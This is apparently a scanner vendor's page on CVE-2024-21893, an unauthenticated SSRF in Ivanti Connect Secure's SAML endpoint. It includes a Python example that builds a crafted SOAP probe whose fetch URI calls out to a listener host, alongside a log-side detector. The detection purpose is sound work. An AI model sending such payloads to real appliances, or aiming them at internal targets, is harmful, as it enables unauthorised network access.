CVE-2024-21893 Scanner
Detects the SSRF vulnerability (CVE-2024-21893) in Ivanti Connect Secure; affected versions are 9.x and 22.x.
Short Info
Level: High
Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 2 months 4 weeks
Scan only one: Domain, IPv4, Subdomain
Toolbox: -
Ivanti Connect Secure is a widely deployed remote access (VPN) appliance that gives users outside the corporate perimeter access to internal networks and resources. Its SAML component handles federated authentication and access control for those remote sessions, so it sits on the unauthenticated edge of the appliance and is reachable before any user has logged in.
The vulnerability detected here is a Server Side Request Forgery (SSRF) flaw in that SAML component. It lets an unauthenticated attacker make the appliance issue requests to an attacker-chosen URI, reaching resources that are only meant to be accessible from the appliance itself, such as services bound to localhost or hosts on the internal network behind the VPN. The attacker never needs valid credentials: the request that triggers the outbound fetch is accepted before authentication takes place.
The flaw is triggered by sending a crafted SOAP request to the '/dana-ws/saml20.ws' endpoint of Ivanti Connect Secure. The attacker controls the contents of that SOAP message, including the URI the appliance will fetch, so the destination can be an internal service, a loopback-bound management endpoint, or an external host the attacker monitors. Because the attacker chooses the destination, a scanner can confirm the flaw safely by embedding a URI it controls and watching for the appliance's outbound request, rather than by reading anything back from the target. Successful exploitation yields unauthorized access to restricted resources and undermines the security of the affected system.
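The probe-and-confirm approach described above, together with a log-side detector for the same request shape, as an added example that is not the page's or Ivanti's own code. It assumes (the page only says "destination URI") that the attacker-controlled fetch is the XML-Signature KeyInfo/RetrievalMethod URI, that the listener host oob.example.net belongs to the tester, and that the element layout of the envelope is illustrative rather than the exact message the appliance's parser requires; the sample listener log is constructed.

```python
"""Added example: out-of-band SSRF probe for /dana-ws/saml20.ws plus a
detector for the same request shape.  Assumptions (not stated on the page):
the sink is the XML-Signature KeyInfo/RetrievalMethod URI, oob.example.net
is a listener we control, and the element layout is illustrative."""
import ipaddress
import secrets
import uuid
import xml.etree.ElementTree as ET
from datetime import datetime, timezone
from typing import List, Tuple
from urllib.parse import urlparse

SAML_WS_PATH = "/dana-ws/saml20.ws"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SAMLP_NS = "urn:oasis:names:tc:SAML:2.0:protocol"
DS_NS = "http://www.w3.org/2000/09/xmldsig#"


def build_probe(callback_base: str, token: str = "") -> Tuple[str, str]:
    """Return (token, SOAP envelope) to POST to SAML_WS_PATH.

    The RetrievalMethod URI points at a listener we control and carries a
    per-scan token in its path, so a request for that token arriving at
    the listener proves the appliance dereferenced our URI.  Nothing is
    read back from the target; confirmation is purely out-of-band."""
    token = token or secrets.token_hex(8)
    uri = f"{callback_base.rstrip('/')}/{token}"
    issue_instant = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    envelope = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
        f'<samlp:AuthnRequest xmlns:samlp="{SAMLP_NS}" ID="_{uuid.uuid4().hex}" '
        f'Version="2.0" IssueInstant="{issue_instant}">'
        f'<ds:Signature xmlns:ds="{DS_NS}"><ds:KeyInfo>'
        f'<ds:RetrievalMethod URI="{uri}" Type="{DS_NS}X509Data"/>'
        "</ds:KeyInfo></ds:Signature>"
        "</samlp:AuthnRequest></soap:Body></soap:Envelope>"
    )
    return token, envelope


def callback_seen(listener_log: List[str], token: str) -> bool:
    """True if any request line recorded on our listener carries the token."""
    return any(f"/{token}" in line for line in listener_log)


def retrieval_uris(path: str, body: str) -> List[str]:
    """URIs of every ds:RetrievalMethod in a body posted to the SAML
    web-service endpoint; [] for other paths or bodies that are not XML."""
    if path.split("?", 1)[0] != SAML_WS_PATH:
        return []
    try:
        root = ET.fromstring(body.encode("utf-8"))
    except ET.ParseError:
        return []
    tag = f"{{{DS_NS}}}RetrievalMethod"
    return [el.get("URI") for el in root.iter(tag) if el.get("URI")]


def classify_target(uri: str) -> str:
    """Where the URI points: 'internal' (loopback, RFC 1918, link-local or
    'localhost'), 'external', or 'opaque' when there is no host part."""
    host = urlparse(uri).hostname
    if not host:
        return "opaque"
    if host == "localhost":
        return "internal"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"
    internal = ip.is_loopback or ip.is_private or ip.is_link_local
    return "internal" if internal else "external"


def triage(path: str, body: str) -> List[Tuple[str, str]]:
    """(uri, classification) for each RetrievalMethod in a request.  Any
    entry deserves an alert: asking the appliance to dereference a key-info
    URI is unusual in SAML traffic, and an 'internal' target is the
    exploitation pattern this scanner looks for."""
    return [(u, classify_target(u)) for u in retrieval_uris(path, body)]


if __name__ == "__main__":
    tok, env = build_probe("http://oob.example.net")
    # Constructed listener log standing in for a real out-of-band server.
    sample_listener_log = [f"GET /{tok} HTTP/1.1", "GET /favicon.ico HTTP/1.1"]
    print("probe token:", tok)
    print("appliance fetched our URI:", callback_seen(sample_listener_log, tok))
    print("detector view of the probe:", triage(SAML_WS_PATH, env))
```

In a real scan the envelope is POSTed to the target's '/dana-ws/saml20.ws' with an XML content type, and the verdict comes from `callback_seen` over the listener's actual request log; the `triage` function is the defender's side of the same shape and can be run over WAF or reverse-proxy request captures for the appliance.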
Exploiting this SSRF lets an attacker reach internal resources without ever authenticating to the VPN, which can lead to data exfiltration, privilege escalation, or further compromise of the network behind the appliance. Requests forged through the appliance originate from a trusted host, so internal services that rely on network position for access control are exposed, and the attacker can use the foothold to stage follow-on attacks against other systems.
By leveraging the security scanning capabilities of the S4E platform, you can proactively detect and mitigate critical vulnerabilities like SSRF in Ivanti Connect Secure. Join our platform to ensure the security of your remote access infrastructure and protect your organization from potential data breaches and unauthorized access attempts.